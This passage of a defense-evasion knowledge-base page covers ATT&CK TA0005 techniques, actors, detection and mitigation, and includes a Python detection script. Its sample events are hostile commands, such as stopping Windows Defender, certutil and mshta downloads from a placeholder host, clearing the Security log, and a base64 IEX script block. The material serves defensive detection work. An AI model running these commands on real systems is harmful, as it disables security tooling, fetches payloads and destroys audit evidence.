| [[t1553-subvert-trust-controls\|T1553 - Subvert Trust Controls]] | T1553 | T1553 - Subvert Trust Controls | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> |
| [[t1553-001-gatekeeper-bypass\|T1553.001 - Gatekeeper Bypass]] | T1553.001 | T1553.001 - Gatekeeper Bypass | <ul><li>macOS</li></ul> |
| [[t1553-002-code-signing\|T1553.002 - Code Signing]] | T1553.002 | T1553.002 - Code Signing | <ul><li>macOS</li><li>Windows</li></ul> |
| [[t1553-003-sip-and-trust-provider-hijacking\|T1553.003 - SIP and Trust Provider Hijacking]] | T1553.003 | T1553.003 - SIP and Trust Provider Hijacking | <ul><li>Windows</li></ul> |
| [[t1553-004-install-root-certificate\|T1553.004 - Install Root Certificate]] | T1553.004 | T1553.004 - Install Root Certificate | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1553-005-mark-of-the-web-bypass\|T1553.005 - Mark-of-the-Web Bypass]] | T1553.005 | T1553.005 - Mark-of-the-Web Bypass | <ul><li>Windows</li></ul> |
| [[t1553-006-code-signing-policy-modification\|T1553.006 - Code Signing Policy Modification]] | T1553.006 | T1553.006 - Code Signing Policy Modification | <ul><li>Windows</li><li>macOS</li></ul> |
| [[t1562-impair-defenses\|T1562 - Impair Defenses]] | T1562 | T1562 - Impair Defenses | <ul><li>Windows</li><li>IaaS</li><li>Linux</li><li>macOS</li><li>Containers</li><li>Network Devices</li><li>Identity Provider</li><li>Office Suite</li><li>ESXi</li></ul> |
| [[t1562-001-disable-or-modify-tools\|T1562.001 - Disable or Modify Tools]] | T1562.001 | T1562.001 - Disable or Modify Tools | <ul><li>Containers</li><li>IaaS</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> |
| [[t1562-001-disable-tools\|T1562.001 - Disable or Modify Tools]] | T1562.001 | T1562.001 - Disable or Modify Tools | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> |
| [[t1562-001-impair-defenses-disable-or-modify-tools\|T1562.001 - Impair Defenses: Disable or Modify Tools]] | T1562.001 | T1562.001 - Impair Defenses: Disable or Modify Tools | <ul><li>Windows</li><li>Linux</li><li>macOS</li></ul> |
| [[t1562-002-disable-windows-event-logging\|T1562.002 - Disable Windows Event Logging]] | T1562.002 | T1562.002 - Disable Windows Event Logging | <ul><li>Windows</li></ul> |
| [[t1562-003-impair-command-history-logging\|T1562.003 - Impair Command History Logging]] | T1562.003 | T1562.003 - Impair Command History Logging | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> |
| [[t1562-004-disable-or-modify-system-firewall\|T1562.004 - Disable or Modify System Firewall]] | T1562.004 | T1562.004 - Disable or Modify System Firewall | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> |
| [[t1562-006-indicator-blocking\|T1562.006 - Indicator Blocking]] | T1562.006 | T1562.006 - Indicator Blocking | <ul><li>Windows</li><li>macOS</li><li>Linux</li><li>ESXi</li></ul> |
| [[t1562-007-disable-or-modify-cloud-firewall\|T1562.007 - Disable or Modify Cloud Firewall]] | T1562.007 | T1562.007 - Disable or Modify Cloud Firewall | <ul><li>IaaS</li></ul> |
| [[t1562-008-disable-or-modify-cloud-logs\|T1562.008 - Disable or Modify Cloud Logs]] | T1562.008 | T1562.008 - Disable or Modify Cloud Logs | <ul><li>IaaS</li><li>SaaS</li><li>Office Suite</li><li>Identity Provider</li></ul> |
| [[t1562-009-safe-mode-boot\|T1562.009 - Safe Mode Boot]] | T1562.009 | T1562.009 - Safe Mode Boot | <ul><li>Windows</li></ul> |
| [[t1562-010-downgrade-attack\|T1562.010 - Downgrade Attack]] | T1562.010 | T1562.010 - Downgrade Attack | <ul><li>Windows</li><li>Linux</li><li>macOS</li></ul> |
| [[t1562-011-spoof-security-alerting\|T1562.011 - Spoof Security Alerting]] | T1562.011 | T1562.011 - Spoof Security Alerting | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> |
| [[t1562-012-disable-or-modify-linux-audit-system\|T1562.012 - Disable or Modify Linux Audit System]] | T1562.012 | T1562.012 - Disable or Modify Linux Audit System | <ul><li>Linux</li></ul> |
| [[t1562-013-disable-or-modify-network-device-firewall\|T1562.013 - Disable or Modify Network Device Firewall]] | T1562.013 | T1562.013 - Disable or Modify Network Device Firewall | <ul><li>Network Devices</li></ul> |
| [[t1564-hide-artifacts\|T1564 - Hide Artifacts]] | T1564 | T1564 - Hide Artifacts | <ul><li>Linux</li><li>Office Suite</li><li>Windows</li><li>macOS</li><li>ESXi</li></ul> |
| [[t1564-001-hidden-files-and-directories\|T1564.001 - Hidden Files and Directories]] | T1564.001 | T1564.001 - Hidden Files and Directories | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> |
| [[t1564-002-hidden-users\|T1564.002 - Hidden Users]] | T1564.002 | T1564.002 - Hidden Users | <ul><li>macOS</li><li>Windows</li><li>Linux</li></ul> |
| [[t1564-003-hidden-window\|T1564.003 - Hidden Window]] | T1564.003 | T1564.003 - Hidden Window | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1564-004-ntfs-file-attributes\|T1564.004 - NTFS File Attributes]] | T1564.004 | T1564.004 - NTFS File Attributes | <ul><li>Windows</li></ul> |
| [[t1564-005-hidden-file-system\|T1564.005 - Hidden File System]] | T1564.005 | T1564.005 - Hidden File System | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1564-006-run-virtual-instance\|T1564.006 - Run Virtual Instance]] | T1564.006 | T1564.006 - Run Virtual Instance | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>ESXi</li></ul> |
| [[t1564-007-vba-stomping\|T1564.007 - VBA Stomping]] | T1564.007 | T1564.007 - VBA Stomping | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> |
| [[t1564-008-email-hiding-rules\|T1564.008 - Email Hiding Rules]] | T1564.008 | T1564.008 - Email Hiding Rules | <ul><li>Windows</li><li>Linux</li><li>macOS</li><li>Office Suite</li></ul> |
| [[t1564-009-resource-forking\|T1564.009 - Resource Forking]] | T1564.009 | T1564.009 - Resource Forking | <ul><li>macOS</li></ul> |
| [[t1564-010-process-argument-spoofing\|T1564.010 - Process Argument Spoofing]] | T1564.010 | T1564.010 - Process Argument Spoofing | <ul><li>Windows</li></ul> |
| [[t1564-011-ignore-process-interrupts\|T1564.011 - Ignore Process Interrupts]] | T1564.011 | T1564.011 - Ignore Process Interrupts | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1564-012-filepath-exclusions\|T1564.012 - File/Path Exclusions]] | T1564.012 | T1564.012 - File/Path Exclusions | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1564-013-bind-mounts\|T1564.013 - Bind Mounts]] | T1564.013 | T1564.013 - Bind Mounts | <ul><li>Linux</li></ul> |
| [[t1564-014-extended-attributes\|T1564.014 - Extended Attributes]] | T1564.014 | T1564.014 - Extended Attributes | <ul><li>Linux</li><li>macOS</li></ul> |
| [[t1574-002-dll-side-loading\|T1574.002 - Hijack Execution Flow: DLL Side-Loading]] | T1574.002 | T1574.002 - Hijack Execution Flow: DLL Side-Loading | <ul><li>Windows</li></ul> |
| [[t1578-modify-cloud-compute-infrastructure\|T1578 - Modify Cloud Compute Infrastructure]] | T1578 | T1578 - Modify Cloud Compute Infrastructure | <ul><li>IaaS</li></ul> |
| [[t1578-001-create-snapshot\|T1578.001 - Create Snapshot]] | T1578.001 | T1578.001 - Create Snapshot | <ul><li>IaaS</li></ul> |
| [[t1578-002-create-cloud-instance\|T1578.002 - Create Cloud Instance]] | T1578.002 | T1578.002 - Create Cloud Instance | <ul><li>IaaS</li></ul> |
| [[t1578-003-delete-cloud-instance\|T1578.003 - Delete Cloud Instance]] | T1578.003 | T1578.003 - Delete Cloud Instance | <ul><li>IaaS</li></ul> |
| [[t1578-004-revert-cloud-instance\|T1578.004 - Revert Cloud Instance]] | T1578.004 | T1578.004 - Revert Cloud Instance | <ul><li>IaaS</li></ul> |
| [[t1578-005-modify-cloud-compute-configurations\|T1578.005 - Modify Cloud Compute Configurations]] | T1578.005 | T1578.005 - Modify Cloud Compute Configurations | <ul><li>IaaS</li></ul> |
| [[t1599-network-boundary-bridging\|T1599 - Network Boundary Bridging]] | T1599 | T1599 - Network Boundary Bridging | <ul><li>Network Devices</li></ul> |
| [[t1599-001-network-address-translation-traversal\|T1599.001 - Network Address Translation Traversal]] | T1599.001 | T1599.001 - Network Address Translation Traversal | <ul><li>Network Devices</li></ul> |
| [[t1600-weaken-encryption\|T1600 - Weaken Encryption]] | T1600 | T1600 - Weaken Encryption | <ul><li>Network Devices</li></ul> |
| [[t1600-001-reduce-key-space\|T1600.001 - Reduce Key Space]] | T1600.001 | T1600.001 - Reduce Key Space | <ul><li>Network Devices</li></ul> |
| [[t1600-002-disable-crypto-hardware\|T1600.002 - Disable Crypto Hardware]] | T1600.002 | T1600.002 - Disable Crypto Hardware | <ul><li>Network Devices</li></ul> |
| [[t1601-modify-system-image\|T1601 - Modify System Image]] | T1601 | T1601 - Modify System Image | <ul><li>Network Devices</li></ul> |
| [[t1601-001-patch-system-image\|T1601.001 - Patch System Image]] | T1601.001 | T1601.001 - Patch System Image | <ul><li>Network Devices</li></ul> |
| [[t1601-002-downgrade-system-image\|T1601.002 - Downgrade System Image]] | T1601.002 | T1601.002 - Downgrade System Image | <ul><li>Network Devices</li></ul> |
| [[t1610-deploy-container\|T1610 - Deploy Container]] | T1610 | T1610 - Deploy Container | <ul><li>Containers</li></ul> |
| [[t1612-build-image-on-host\|T1612 - Build Image on Host]] | T1612 | T1612 - Build Image on Host | <ul><li>Containers</li></ul> |
| [[t1620-reflective-code-loading\|T1620 - Reflective Code Loading]] | T1620 | T1620 - Reflective Code Loading | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1622-debugger-evasion\|T1622 - Debugger Evasion]] | T1622 | T1622 - Debugger Evasion | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1647-plist-file-modification\|T1647 - Plist File Modification]] | T1647 | T1647 - Plist File Modification | <ul><li>macOS</li></ul> |
| [[t1655-hide-artifacts-android\|T1655 - Hide Artifacts (Android)]] | T1655 | T1655 - Hide Artifacts (Android) | <ul><li>Android</li></ul> |
| [[t1656-impersonation\|T1656 - Impersonation]] | T1656 | T1656 - Impersonation | <ul><li>Linux</li><li>macOS</li><li>Office Suite</li><li>SaaS</li><li>Windows</li></ul> |
| [[t1666-modify-cloud-resource-hierarchy\|T1666 - Modify Cloud Resource Hierarchy]] | T1666 | T1666 - Modify Cloud Resource Hierarchy | <ul><li>IaaS</li></ul> |
| [[t1672-email-spoofing\|T1672 - Email Spoofing]] | T1672 | T1672 - Email Spoofing | <ul><li>Office Suite</li><li>Windows</li><li>macOS</li><li>Linux</li></ul> |
| [[t1678-delay-execution\|T1678 - Delay Execution]] | T1678 | T1678 - Delay Execution | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1679-selective-exclusion\|T1679 - Selective Exclusion]] | T1679 | T1679 - Selective Exclusion | <ul><li>Windows</li></ul> |
<!-- SerializedQuery END -->
## Mindmap — Defense Evasion Techniques
```mermaid
mindmap
  root((TA0005<br/>Defense Evasion))
    Obfuscation
      T1027 Obfuscated Files
      T1140 Deobfuscate/Decode
      T1620 Reflective Code Loading
      Packers and Crypters
    Masquerading
      T1036 Masquerading
      T1218 System Binary Proxy
        LOLBins LOTL
        Legitimate Process
    Disabling Defenses
      T1562 Impair Defenses
        T1562.001 Disable Tools
      T1014 Rootkit
      T1497 Sandbox Evasion
    Evidence Removal
      T1070 Indicator Removal
        Clear Logs
        Delete Temporary Files
    Process Injection
      T1055 Process Injection
        DLL Injection
        Process Hollowing
    Hijacking
      T1574 Hijack Execution Flow
        T1574.002 DLL Side-Loading
      T1112 Modify Registry
    Alternate Authentication
      T1550.001 App Access Token
      T1550.002 Pass the Hash
      T1078 Valid Accounts
```
## Actors That Use This Tactic
| Actor | Characteristic Evasion Technique |
|-------|----------------------------------|
| [[g1017-volt-typhoon\|Volt Typhoon]] | Full LOTL: wmic, netsh and ntdsutil used exclusively |
| [[Cozy Bear]] | Heavy PowerShell obfuscation, process injection into lsass |
| [[g0032-lazarus-group\|Lazarus Group]] | DLL side-loading, sandbox evasion, anti-VM checks |
| [[g0096-apt41\|APT41]] | Rootkits, firmware implants, reflective DLL loading |
| [[g0034-sandworm\|Sandworm]] | Indicator removal, wiper malware that destroys evidence |
## Detection and Mitigation
### Detection
- **AMSI / Script Block Logging:** captures PowerShell scripts after deobfuscation
- **Behavioral EDR:** detection of process hollowing and reflective DLL loading
- **SIEM:** alerts on `net stop` against AV/EDR services and on Windows Defender being disabled
- **Threat Hunting:** look for LOLBins used anomalously (wmic, certutil, mshta)
- **File Integrity Monitoring:** alerts on modification of system log files
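As an added example (not code from the original page or from the MITRE ATT&CK project), the following Python script turns the SIEM, threat-hunting, log-clearing and Script Block Logging bullets above into runnable detection logic over constructed telemetry. The `Event` record, the rule functions, the AV service list, the LOLBin argument patterns and the sample events are all assumptions made for illustration; real deployments would express the same logic as Sigma or EDR rules over Sysmon EID 1, PowerShell EID 4104 and Security EID 1102.

```python
"""Toy TA0005 detection rules run over constructed Sysmon/PowerShell-style records.

Assumed record shape (not a real log format): kind, host, cmdline, image.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str          # "process" (Sysmon EID 1), "scriptblock" (PowerShell EID 4104), "log" (Security EID 1102)
    host: str
    cmdline: str = ""  # command line, or the decoded script block text for EID 4104
    image: str = ""    # process image basename


# Windows service names of AV/EDR components (constructed, partial list; assumption)
AV_SERVICES = {"windefend", "sense", "wdnissvc"}

# LOLBins paired with argument patterns that are rarely legitimate on end-user hosts (assumption)
LOLBIN_RULES = {
    "certutil.exe": re.compile(r"-urlcache|-decode", re.I),
    "mshta.exe":    re.compile(r"https?://|vbscript:|javascript:", re.I),
    "wmic.exe":     re.compile(r"process\s+call\s+create|/node:", re.I),
}

SERVICE_STOP = re.compile(r'\b(?:net1?|sc)(?:\.exe)?\s+(?:stop|delete|config)\s+"?([\w-]+)', re.I)
DEFENDER_OFF = re.compile(r"Set-MpPreference\b[^|;]*-Disable\w+", re.I)
LOG_CLEAR    = re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b|\bClear-EventLog\b", re.I)
# Indicators visible in the script block because the engine logs it after deobfuscation
OBFUSCATION = [
    ("base64 payload",  re.compile(r"FromBase64String|-e(?:nc|ncodedcommand)\b", re.I)),
    ("dynamic eval",    re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("char-code build", re.compile(r"\[char\]\s*\d+", re.I)),
]


def check_tampering(ev: Event) -> list[str]:
    """SIEM rule: AV/EDR service stopped or a Defender feature disabled (T1562.001)."""
    hits = []
    m = SERVICE_STOP.search(ev.cmdline)
    if m and m.group(1).lower() in AV_SERVICES:
        hits.append(f"{ev.host}: security service {m.group(1)} stopped or modified")
    if DEFENDER_OFF.search(ev.cmdline):
        hits.append(f"{ev.host}: Defender feature disabled via Set-MpPreference")
    return hits


def check_lolbin(ev: Event) -> list[str]:
    """Hunting rule: LOLBin invoked with anomalous arguments (T1218 / LOTL)."""
    rule = LOLBIN_RULES.get(ev.image.lower())
    if rule and rule.search(ev.cmdline):
        return [f"{ev.host}: anomalous {ev.image} use: {ev.cmdline}"]
    return []


def check_log_clearing(ev: Event) -> list[str]:
    """SIEM rule: event log cleared (T1070), seen either as EID 1102 or on the command line."""
    if ev.kind == "log" or LOG_CLEAR.search(ev.cmdline):
        return [f"{ev.host}: event log cleared"]
    return []


def check_scriptblock(ev: Event) -> list[str]:
    """Script Block Logging rule: two or more obfuscation indicators in one logged block (T1027)."""
    found = [name for name, rx in OBFUSCATION if rx.search(ev.cmdline)]
    if len(found) >= 2:  # a single indicator is common in admin scripts; two together merit a look
        return [f"{ev.host}: obfuscated PowerShell ({', '.join(found)})"]
    return []


def run_rules(events: list[Event]) -> list[str]:
    """Apply every rule to every event and return the alerts in event order."""
    alerts: list[str] = []
    for ev in events:
        if ev.kind == "process":
            alerts += check_tampering(ev) + check_lolbin(ev) + check_log_clearing(ev)
        elif ev.kind == "scriptblock":
            alerts += check_scriptblock(ev)
        elif ev.kind == "log":
            alerts += check_log_clearing(ev)
    return alerts


# Constructed sample telemetry (not real captures); example.invalid is a reserved placeholder domain
SAMPLE_EVENTS = [
    Event("process", "ws01", "net stop WinDefend", "net.exe"),
    Event("process", "ws01", "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt", "certutil.exe"),
    Event("process", "ws02", "certutil.exe -verify server.cer", "certutil.exe"),  # benign use
    Event("process", "ws02", "mshta.exe http://example.invalid/p.hta", "mshta.exe"),
    Event("process", "ws03", "wevtutil.exe cl Security", "wevtutil.exe"),
    Event("scriptblock", "ws03", "$p=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b)); IEX $p"),
    Event("scriptblock", "ws04", "Get-ChildItem C:\\Temp | Remove-Item"),  # benign admin script
]

if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print(alert)
```

Running the script yields five alerts (the two benign events produce none). The two-indicator threshold in `check_scriptblock` and the per-LOLBin argument patterns are tuning choices: a blanket alert on every `certutil.exe` execution would drown the analyst, which is why the hunting bullet says "used anomalously" rather than "used".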
### Mitigation
- Enable **tamper protection** in Microsoft Defender (prevents it from being disabled)
- Restrict execution of non-essential LOLBins via AppLocker/WDAC
- Centralize logs in an immutable SIEM (adversaries cannot erase them)
- Enable **Protected Process Light (PPL)** for lsass.exe
- Deploy an EDR with behavioral detection capability (not just signatures)
## LATAM/Brazil Relevance
Brazilian banking malware such as [[s0531-grandoreiro|Grandoreiro]] and [[mekotio|Mekotio]] makes extensive use of sandbox evasion techniques, detecting analysis environments through checks of screen resolution, mouse movement and the presence of analysis tools. Custom packers and locally produced crypters make these samples resistant to antivirus detection.
The Brazilian underground ecosystem sells "crypting" services (turning detectable malware into a variant that passes scanners) at affordable prices, democratizing advanced evasion techniques for less sophisticated groups.
- [[ta0004-privilege-escalation|TA0004 - Privilege Escalation]] — previous phase
- [[ta0006-credential-access|TA0006 - Credential Access]] — next phase
- [[t1027-obfuscated-files|T1027 - Obfuscated Files]] — payload obfuscation
- [[t1036-masquerading|T1036 - Masquerading]] — disguising a malicious process
- [[t1562-001-disable-tools|T1562.001 - Disable or Modify Tools]] — disabling AV/EDR
- [[t1070-indicator-removal|T1070 - Indicator Removal]] — evidence removal
- [[t1218-system-binary-proxy-execution|T1218 - System Binary Proxy Execution]] — abuse of legitimate binaries
- [[Sandbox Evasion]] — anti-analysis
- [[g1017-volt-typhoon|Volt Typhoon]] — reference for pure LOTL
- [[_techniques|Technique Index]] — overview of all documented techniques
## References
- [[ta0005-*|MITRE ATT&CK - TA0005 Defense Evasion]]
- [CISA — Living Off the Land Techniques](https://www.cisa.gov/resources-tools/resources/living-off-the-land)